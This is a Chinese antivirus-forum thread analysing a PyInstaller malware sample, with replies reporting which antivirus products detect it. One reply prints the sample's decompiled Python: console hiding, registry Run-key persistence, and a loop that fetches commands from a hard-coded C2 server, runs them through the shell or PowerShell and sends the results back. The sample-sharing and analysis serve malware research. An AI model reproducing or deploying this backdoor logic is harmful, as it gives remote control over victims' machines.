查看: 1549|回复: 15
收起左侧

[病毒样本] CobaltStrike/Pyinstaller 1x

[复制链接]
DisaPDB
发表于 2024-3-24 22:52:33 | 显示全部楼层 |阅读模式
swizzer
发表于 2024-3-24 22:55:21 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
祸兮福所倚
头像被屏蔽
发表于 2024-3-24 22:56:03 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
biue
发表于 2024-3-24 23:32:49 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Fadouse
发表于 2024-3-24 23:52:21 | 显示全部楼层
Kaspersky Kill
  1. Event: Malicious object detected
  2. User: LAPTOP\Fadouse
  3. User type: Initiator
  4. Application name: explorer.exe
  5. Application path: C:\Windows
  6. Component: File Anti-Virus
  7. Result description: Detected
  8. Type: Trojan
  9. Name: UDS:Trojan.Win64.Shelm
  10. Precision: Exactly
  11. Threat level: High
  12. Object type: File
  13. Object name: run_code.exe
  14. Object path: E:\Code\Virus
  15. MD5 of an object: A1FE2997F33D33C75860F5FEFD961C54
  16. Reason: Cloud Protection
复制代码


t0kenzero
发表于 2024-3-25 00:00:08 | 显示全部楼层
本帖最后由 t0kenzero 于 2024-3-25 00:16 编辑

这算是个什么玩意? 疯狂请求个404地址 没看出来是cs
gethied()
global still
ct = win32api.GetConsoleTitle()
hd = win32gui.FindWindow(0, ct)
win32gui.ShowWindow(hd, 0)
still=1

getRegedit()
key_path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path, 0, winreg.KEY_SET_VALUE)
value=sys.executable
winreg.SetValueEx(key, "test", 0, winreg.REG_SZ,value)

getCmd()
shellname = subprocess.run('hostname', shell=True, capture_output=True, text=True).stdout.strip()
url = f"http://38.12.0.151/GET/getUshell/output/{shellname}output.txt"
reUrl='http://38.12.0.151/GET/getUshell/results.php'
while 1:
    try:
        time.sleep(5)
        resp = requests.get(url).text
        cmd = resp.strip()
        if cmd == 'getUfriends':
            netList=[]
            hisFriends=str(sniff_ip(netList))
            data = {'shellname': shellname, 'results': hisFriends}
            requests.post(reUrl, data)
            time.sleep(10)
        else:
            match = None
            try:
                pattern = re.compile(r'^powershell=')
                match = pattern.match(cmd)
            except:
                pass
            if match:
                threading.Thread(target=powershell,args=(cmd,)).start()
            else:
                shell = subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout
                data={'shellname':shellname,'results':shell}
                requests.post(reUrl,data)
    except:
        pass

powershell()
powershell = cmd.split('powershell=')
subprocess.run(['powershell', '-Command', powershell[-1]], capture_output=True, text=True, check=True)

send()
try:
    shellname = subprocess.run('hostname',shell=True,capture_output=True,text=True).stdout.strip()
    sqlurl = f"http://38.12.0.151/GET/getUshell/userShells.php?shellname={shellname}&username={user}"
    requests.get(sqlurl)
except:
    pass

GDHJDSYDH
发表于 2024-3-25 00:57:45 | 显示全部楼层
EIS扫描miss
chx818
发表于 2024-3-25 01:31:37 | 显示全部楼层
本帖最后由 chx818 于 2024-3-25 01:34 编辑

双击ESET miss,ElasticSecurity击杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
DisaPDB
 楼主| 发表于 2024-3-25 06:55:51 | 显示全部楼层
本帖最后由 DisaPDB 于 2024-3-25 07:01 编辑
t0kenzero 发表于 2024-3-25 00:00
这算是个什么玩意? 疯狂请求个404地址 没看出来是cs

我也没看出来
但微步标记了
马应该是那个C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\TEMP\_MEI67722\PYWINTYPES37.DLL



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
心醉咖啡
发表于 2024-3-25 08:05:40 | 显示全部楼层
360未知
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-22 17:09 , Processed in 0.133393 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表